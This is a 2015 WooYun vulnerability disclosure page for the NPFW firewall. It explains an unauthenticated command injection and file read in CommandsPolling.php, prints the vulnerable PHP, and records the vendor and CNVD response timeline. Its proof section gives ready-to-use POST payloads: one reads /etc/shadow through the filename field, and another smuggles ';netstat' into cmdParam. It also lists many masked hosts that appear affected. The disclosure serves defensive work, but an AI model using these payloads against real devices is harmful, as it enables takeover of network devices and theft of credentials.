当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(17) 关注此漏洞

缺陷编号: WooYun-2015-140998

漏洞标题: 中科网威防火墙(NPFW)存在任意命令执行&文件遍历(都无需登录)

相关厂商: 北京中科网威信息技术有限公司

漏洞作者: YY-2012

提交时间: 2015-09-16 09:03

公开时间: 2015-12-17 13:52

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 设计缺陷/边界绕过 逻辑错误 设计不当导致攻击界面扩大

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-21: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

rt

详细说明:

原因出自/direct/polling/CommandsPolling.php文件,详情请看源代码:

code 区域
<?php\ninclude_once 'command\/CCmdsPolling.php';\n\n


$command = isset($_POST['command'])?$_POST['command']:\"\";\n


$saveFile = isset($_POST['filename'])?$_POST['filename']:\"\";\n


$cmdParam = isset($_POST['cmdParam'])?$_POST['cmdParam']:\"\";\n


$cmdParam = trim($cmdParam);\n


$faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array(\"exception\", \"\", \"\") ));\n\n\/\/command is null\nif(empty($command))


{  \n    echo $faultStr;\n    exit();\n}


\n\n\/\/exec and get result\n$result = array();


\n$pollingObj = new CCmdsPolling();\nif($command == \"ping\") 


{\n    $result = $pollingObj->getPingInfo($cmdParam, $saveFile);\n} 


else if ($command == \"traceroute\")


 {\n    $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);\n} 


else {\n    echo $faultStr;\n    exit();\n}


\n\n\/\/analyse result state and return\nif($result['state'] == \"exception\")


 {\t\n    echo $faultStr;\n} 


 else if($result['state'] == \"starting\") 


 {\t\t   \n       $re_file=$result['result'];\n       $filename=$result['filename'];


\n       $finished=false;


\n       echo json_encode(array(\n                         'type'=>'event',


\n                         'name'=>'message',


\n                         'data'=>array(\"starting\", $re_file, $filename)\n                        ));


 \n} else if($result['state'] == \"dealing\") {\n       $re_file=$result['result'];


 \n       $filename=$result['filename'];


 \n       echo json_encode(array(\n                         'type'=>'event',


 \n                         'name'=>'message',


 \n                         'data'=>array(\"dealing\", $re_file, $filename)\n                        )); 


 \n} else if($result['state'] == \"finished\") {\n     $re_file=$result['result'];


 \n     echo json_encode(array(\n                        'type'=>'event',


 \n                        'name'=>'message',


 \n                        'data'=>array(\"finished\", $re_file, \"\")\n                        ));


 \n} else {


 \n     echo json_encode


 (array(\n                        


 'type'=>'event',\n                        


 'name'=>'message',\n                        


 'data'=>array(\"unknown\", \"\", \"\")\n                        


 )); \n}\n\n?> \n","





漏洞证明:

如下利用方式:

1.任意系统文件遍历:

code 区域
https://地址/direct/polling/CommandsPolling.php


POST:command=ping&filename=/etc/shadow&cmdParam=**.**.**.**



aaaaaaaaaaaa1111111111111111111111.jpg





aaaaaaaaaaaaaaaa22222222222222222222222222.jpg





aaaaaaaaaaaaa3333333333333333333.jpg





2.任意系统命令执行

code 区域
https://地址/direct/polling/CommandsPolling.php


首先发送要执行的命令,POST:command=ping&filename=&cmdParam=**.**.**.**;netstat


之后获命令结果保存的文件路径,POST:command=ping&filename=&cmdParam=**.**.**.**,netstat


最后获取文件内容(命令执行结果),POST:command=ping&filename=&cmdParam=**.**.**.**,netstat





aaaaaaaaaaaaa444444444444444444.jpg





aaaaaaaaaaaaaaaaaa5555555555555555555555.jpg





aaaaaaaaaaaaaaaaaaaa6666666666666666666.jpg





aaaaaaaaaaaaaaaaaa777777777777777777777777.jpg





aaaaaaaaaaaaaaaaaa888888888888888888888888888.jpg





案例:

code 区域
**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


https://**.**.**.**/


https://**.**.**.**/


**.**.**.**/


https://5mart.**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


https://**.**.**.**/


https://**.**.**.**/


**.**.**.**/


https://www.**.**.**.**/


**.**.**.**/


**.**.**.**/


https://**.**.**.**/


https://www.**.**.**.**/


**.**.**.**/


https://**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


https://**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


https://**.**.**.**/


https://**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/


**.**.**.**/

修复方案:

联系厂商。

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-18 13:51

厂商回复:


CNVD确认并复现所述情况,已经由CNVD通过已有联系处置渠道向软件生产厂商通报。 对方反馈已经在积极处置.

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录